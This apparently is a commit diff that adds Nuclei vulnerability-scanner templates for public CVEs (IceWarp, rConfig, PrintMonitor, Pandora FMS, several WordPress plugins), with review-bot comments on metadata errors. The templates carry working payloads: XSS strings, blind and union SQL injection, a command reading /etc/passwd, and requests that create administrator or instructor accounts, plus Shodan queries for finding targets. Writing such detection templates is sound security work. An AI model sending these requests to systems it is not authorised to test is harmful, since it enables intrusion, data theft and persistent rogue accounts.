templates added
parent
f08daa5e82
commit
1b2fddb9cb
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2023-37728
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Icewarp Icearp v10.2.1 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
|
||||||
|
reference:
|
||||||
|
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.favicon.hash:2144485375
|
||||||
|
tags: cve,cve2023,icearp,icewarp,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
|
||||||
|
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
|
||||||
|
- 'contains(body, "<img src onerror=alert(document.domain)>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2015-20067
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP Attachment Export < 0.2.4 - Unrestricted File Download
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
|
||||||
|
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
|
||||||
|
- https://packetstormsecurity.com/files/132693/
|
||||||
|
- https://seclists.org/fulldisclosure/2015/Jul/73
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-20067
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2015-20067
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cwe-id: 862
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2015,wordpress,wp,wp-plugin,access,control,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
|
||||||
|
- "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(header, "text/xml")'
|
||||||
|
- 'contains_all(body, "title","wp:author_id","wp:author_email")'
|
||||||
|
condition: and
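Review bot: `cwe-id: 862` is a bare integer; every other template in this commit writes the identifier as `CWE-NNN`, so use `cwe-id: CWE-862` to keep it parseable by the same tooling. While here, `Wordpress` in the description should be `WordPress`. The matcher (`text/xml` plus `wp:author_id`/`wp:author_email` in the body) is a sound test for an unauthenticated export, but a positive hit means the scanner has just downloaded every author's email and any plaintext post passwords the export contains, so the output should be handled as sensitive data.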
|
|
@ -0,0 +1,48 @@
|
||||||
|
id: CVE-2018-7282
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TITool PrintMonitor - Blind SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
|
||||||
|
remediation: Upgrade to PM18.2.1.
|
||||||
|
reference:
|
||||||
|
- https://fenceposterror.github.io/cve-2018-7282.txt
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7282
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2018-7282
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: title:"PrintMonitor"
|
||||||
|
max-request: 1
|
||||||
|
cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:*
|
||||||
|
vendor: titool
|
||||||
|
product": printmonitor
|
||||||
|
tags: cve,cve2018,sqli,printmonitor,unauth
|
||||||
|
|
||||||
|
variables:
|
||||||
|
username: "{{rand_base(6)}}"
|
||||||
|
password: "{{rand_base(8)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
POST /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(body, "PrintMonitor") && contains(header, "text/html")'
|
||||||
|
condition: and
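Review bot: `product": printmonitor` carries a stray double quote, so YAML parses the key as `product"` rather than `product` and the metadata field is silently lost; write `product: printmonitor`. `verified: "true"` is a string where the rest of this commit uses the boolean `verified: true`. The `duration>=6` check assumes the `RANDOMBLOB` query takes at least six seconds on the target, which is not guaranteed on fast hosts; that is inherent to time-based blind detection, but a short comment on the matcher (`# heavy-query delay; a miss here is not proof the host is patched`) would keep a negative result from being over-read.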
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2019-15829
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/9443
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15829
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
|
||||||
|
- 'contains(body_2, "post galleries!")'
|
||||||
|
condition: and
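Review bot: The tag list says `cve2023`, but this is CVE-2019-15829, so the template is excluded from `-tags cve2019` runs and wrongly included in 2023 runs; change it to `cve2019`. The template also has no `classification` block (no `cve-id`, `cvss-metrics`, `cwe-id`), unlike its siblings in this commit; at minimum add `cve-id: CVE-2019-15829` and `cwe-id: CWE-79`.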
|
|
@ -1,49 +1,39 @@
|
||||||
id: CVE-2020-10220
|
id: CVE-2020-10220
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: rConfig 3.9 - SQL injection
|
name: rConfig 3.9 - SQL Injection
|
||||||
author: ritikchaddha
|
author: theamanrawat
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
|
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
|
||||||
remediation: |
|
|
||||||
Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
|
|
||||||
reference:
|
reference:
|
||||||
- http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://www.exploit-db.com/exploits/48208
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
|
||||||
- http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
|
|
||||||
- http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
|
|
||||||
- https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2020-10220
|
cve-id: CVE-2020-10220
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
epss-score: 0.02204
|
|
||||||
epss-percentile: 0.88193
|
|
||||||
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 1
|
shodan-query: http.title:"rConfig"
|
||||||
vendor: rconfig
|
tags: cve,cve2020,rconfig,sqli
|
||||||
product: rconfig
|
|
||||||
shodan-query: title:"rConfig"
|
|
||||||
tags: packetstorm,cve,cve2020,rconfig,sqli
|
|
||||||
variables:
|
variables:
|
||||||
num: "999999999"
|
num: 999999999
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- method: GET
|
||||||
- |
|
path:
|
||||||
GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
|
- "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
|
||||||
Host: {{Hostname}}
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '{{md5({{num}})}}'
|
- "{{md5(num)}}"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
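Review bot: The new side changes `num` from the quoted `"999999999"` to a bare `999999999`, which YAML now loads as an integer; the path interpolates it inside `md5('{{num}}')` and the matcher computes `{{md5(num)}}` on the variable, so both still hash the same digits, but keeping `num: "999999999"` quoted avoids relying on the DSL's int-to-string coercion. If the single-sided `remediation`, `epss-score`/`epss-percentile`, `cpe` and `vendor`/`product` lines are removals rather than additions, as the line counts in the hunk header suggest, that is a metadata regression against the template this diff replaces and they should be restored. The hunk ends inside the `status` matcher, so the status value itself is outside this view.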
|
||||||
|
|
|
@ -0,0 +1,48 @@
|
||||||
|
id: CVE-2020-12256
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-12256
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.4
|
||||||
|
cve-id: CVE-2020-12256
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2020,rconfig,authenticated,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_3 == 200'
|
||||||
|
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
|
||||||
|
- 'contains(content_type_3, "text/html")'
|
||||||
|
condition: and
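Review bot: `max-request: 1` undercounts — the raw section issues three requests (GET /login.php, the login POST and the XSS GET), so this should be `max-request: 3` for rate accounting to be right. The payload is sent unencoded in the request line (`deviceId="><script>...`), which some servers reject with 400; the CVE-2019-15829 template in this same commit URL-encodes its payload, and doing the same here (`deviceId=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E`) makes the probe more portable without changing the match. `verified: "true"` should be the boolean `true` as elsewhere in the commit.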
|
|
@ -0,0 +1,48 @@
|
||||||
|
id: CVE-2020-12259
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.4
|
||||||
|
cve-id: CVE-2020-12259
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2020,rconfig,authenticated,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_3 == 200'
|
||||||
|
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
|
||||||
|
- 'contains(content_type_3, "text/html")'
|
||||||
|
condition: and
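Review bot: `max-request: 1` should be `max-request: 3`, since the raw section sends three requests before the matcher runs. The description's last clause says "the rid GET parameter of devicemgmnt.php" while the probe correctly targets `configDevice.php` (as the first sentence says); trimming the tail to "...in the `rid` GET parameter of configDevice.php" removes the contradiction. As with the sibling CVE-2020-12256 template, the unencoded `"><script>` in the request line could be URL-encoded for portability, and `verified: "true"` should be the boolean.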
|
|
@ -0,0 +1,95 @@
|
||||||
|
id: CVE-2020-13638
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9 - Authentication Bypass(Admin Login)
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-13638
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2020-13638
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
tags: cve,cve2020,rconfig,authenticatio-bypass,escalation
|
||||||
|
|
||||||
|
variables:
|
||||||
|
username: "{{to_lower(rand_text_alpha(5))}}"
|
||||||
|
password: "{{rand_text_alphanumeric(12)}}!"
|
||||||
|
email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
|
||||||
|
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="username"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="passconf"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="password"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="email"
|
||||||
|
|
||||||
|
{{email}}
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="editid"
|
||||||
|
|
||||||
|
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="add"
|
||||||
|
|
||||||
|
add
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="ulevelid"
|
||||||
|
|
||||||
|
9
|
||||||
|
--01b28e152ee044338224bf647275f8eb--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_3
|
||||||
|
words:
|
||||||
|
- "rConfig - Configuration Management"
|
||||||
|
- "Logged in as"
|
||||||
|
- "dashboadFieldSet"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_3
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
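Review bot: This template creates a persistent level-9 account on the target — the first request posts `add=add` with `ulevelid=9` and random credentials that are never cleaned up — so it should carry the `intrusive` tag so it is excluded from default runs, and the description should say an account is left behind. `authenticatio-bypass` in the tag list is misspelled; the conventional tag is `auth-bypass`. `cwe-id: CWE-89` labels this as SQL injection, while the flaw described is an authentication bypass leading to account creation (CWE-287/CWE-306 are the usual classes) — check against the NVD entry. `metadata` has no `max-request`; three requests are sent.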
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: CVE-2020-13851
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Artica Pandora FMS 7.44 - Remote Code Execution
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Artica Pandora FMS 7.44 allows remote command execution via the events feature.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-13851
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2022-13851
|
||||||
|
cwe-id: CWE-78
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: title:"Pandora FMS"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2020,rce,pandora,unauth,artica
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'root:.*:0:0:'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
- "PHPSESSID="
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
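Review bot: `cve-id: CVE-2022-13851` does not match the template id `CVE-2020-13851`; fix the year. The `unauth` tag conflicts with the `PR:L` component of the CVSS vector, and the request carries no session cookie while the matcher expects a `PHPSESSID=` header — if the events endpoint in fact requires a logged-in user, as the vector suggests, this needs a login step and the `authenticated` tag; if it really is reachable anonymously, the vector should be corrected instead. `verified: "true"` should be the boolean.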
|
|
@ -0,0 +1,56 @@
|
||||||
|
id: CVE-2020-8615
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
|
||||||
|
remediation: update to v.1.5.3
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8615
|
||||||
|
- https://wpscan.com/vulnerability/10058
|
||||||
|
- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
|
||||||
|
cvss-score: 6.5
|
||||||
|
cwe-id: CWE-352
|
||||||
|
cve-id: CVE-2020-8615
|
||||||
|
cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
publicwww-query: "/wp-content/plugins/tutor/"
|
||||||
|
tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan
|
||||||
|
|
||||||
|
variables:
|
||||||
|
user: "{{rand_base(6)}}"
|
||||||
|
pass: "{{rand_base(8)}}"
|
||||||
|
email: "{{randstr}}@{{rand_base(5)}}.com"
|
||||||
|
firstname: "{{rand_base(5)}}"
|
||||||
|
lastname: "{{rand_base(5)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(content_type_2, "application/json")'
|
||||||
|
- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
condition: and
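Review bot: The tag list says `cve2023` for CVE-2020-8615; use `cve2020`. The second request creates a new instructor user with random credentials that is never removed, so add the `intrusive` tag so the template is skipped by default and mention the leftover account in the description. `max-request: 1` should be `2` (login plus the admin-ajax POST). The body also sends `action=` twice (`add_new_instructor` then `tutor_add_instructor`); PHP keeps the last value, so the first is dead weight and can be dropped to make the request clearer.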
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2021-24215
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource.
|
||||||
|
remediation: Fixed in version 1.5.2
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/eec0f29f-a985-4285-8eed-d1855d204a20
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24215
|
||||||
|
- https://www.opencve.io/cve/CVE-2021-24215
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cwe-id: CWE-284
|
||||||
|
cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
publicwww-query: "/wp-content/plugins/controlled-admin-access/"
|
||||||
|
tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/options.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")'
|
||||||
|
condition: and
